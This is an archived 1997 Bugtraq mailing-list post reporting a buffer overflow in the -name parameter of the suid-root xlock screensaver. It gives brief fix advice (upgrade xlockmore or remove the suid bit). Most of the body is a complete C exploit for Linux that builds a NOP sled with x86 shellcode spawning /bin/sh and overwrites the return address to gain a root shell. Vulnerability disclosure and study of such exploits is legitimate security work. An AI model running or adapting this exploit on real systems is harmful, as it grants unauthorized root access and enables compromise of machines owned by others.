From - Tue Aug 05 09:43:30 1997 Return-Path: Received: from mwunix.mitre.org by smiley. (4.1/SMI-4.1) id AA23435; Sat, 26 Apr 97 18:51:06 EDT Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by mwunix.mitre.org (8.8.5/8.8.5/mitre.0) with ESMTP id SAA14608; Sat, 26 Apr 1997 18:51:41 -0400 (EDT) Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by mbunix.mitre.org (8.8.5/8.8.5/mitre.0) with ESMTP id SAA01992; Sat, 26 Apr 1997 18:51:40 -0400 (EDT) Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <35705-9026>; Sat, 26 Apr 1997 18:42:39 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 3515876 for BUGTRAQ@NETSPACE.ORG; Sat, 26 Apr 1997 18:23:48 -0400 Received: from brimstone.netspace.org (brimstone [128.148.157.143]) by netspace.org (8.8.5/8.8.2) with ESMTP id SAA09010 for ; Sat, 26 Apr 1997 18:12:04 -0400 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <32922-9028>; Sat, 26 Apr 1997 18:16:10 -0400 Approved-By: aleph1@UNDERGROUND.ORG Received: from nitro.0wned.org (root@0wned.org [204.50.58.21]) by netspace.org (8.8.5/8.8.2) with ESMTP id QAA29528 for ; Sat, 26 Apr 1997 16:11:16 -0400 Received: from warrior.0wned.org (RFD.0wned.org [204.50.58.22]) by nitro.0wned.org (8.8.5/8.6.9) with SMTP id PAA03813 for ; Sat, 26 Apr 1997 15:15:01 -0400 Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-Id: Date: Sat, 26 Apr 1997 16:16:05 -0400 Reply-To: George Staikos Sender: Bugtraq List From: George Staikos Subject: Overflow in xlock To: BUGTRAQ@NETSPACE.ORG Status: RO X-Mozilla-Status: 2001 Content-Length: 2453 There appears to be an exploitable buffer overflow in xlock, the X based screensaver/locker. Xlock is installed suid root on machines with shadowed passwords. I have verified this on xlock versions on AIX 4.x and Linux (exploit for Linux posted below), but I cannot determine what version I was using, as xlock does not seem to contain version information in the binary and I don't have the original source. The overflow is in the -name parameter, and it is fixed in xlockmore-4.01, available on sunsite in /pub/Linux/X11/screensavers/xlockmore-4.01.tgz . Other platforms have not been checked for this, and while this is an older version of xlock, many systems seem to come preloaded with this version. Also, xlock does not need to be suid root unless it is running on a machine with shadowed passwords, so another possible fix it chmod u-s xlock. /* x86 XLOCK overflow exploit by cesaro@0wned.org 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit Assumptions: xlock is suid root, and installed in /usr/X11/bin */ #include #include #include #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; if (argc > 1) dfltOFFSET = atoi(argv[1]); else printf("You can specify another offset as a parameter if you need...\n"); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); }